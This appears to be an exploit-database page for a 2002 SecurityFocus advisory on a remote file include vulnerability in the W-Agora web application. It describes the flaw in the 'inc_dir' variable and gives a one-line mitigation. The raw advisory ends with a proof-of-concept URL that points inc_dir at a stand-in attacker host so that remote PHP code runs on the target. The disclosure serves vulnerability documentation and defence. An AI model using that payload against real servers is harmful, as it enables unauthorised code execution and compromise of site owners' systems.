header-logo
Suggest Exploit
vendor:
W-Agora
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: W-Agora
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

W-Agora Remote File Include Vulnerability

W-Agora is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. In particular, the 'inc_dir' variable found in a number of the W-Agora scripts defines the path to the configuration file. It is possible, under some configurations, for an attacker to specify an arbitrary value for the location of the configuration file which points to a file on a remote server. If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code.

Mitigation:

Ensure that the 'inc_dir' variable is set to a valid path and that it is not possible for an attacker to modify it.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4977/info

W-Agora is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. In particular, the 'inc_dir' variable found in a number of the W-Agora scripts defines the path to the configuration file. It is possible, under some configurations, for an attacker to specify an arbitrary value for the location of the configuration file which points to a file on a remote server.

If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code.

http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt

Navigation

Suggest Exploit

Services By CQR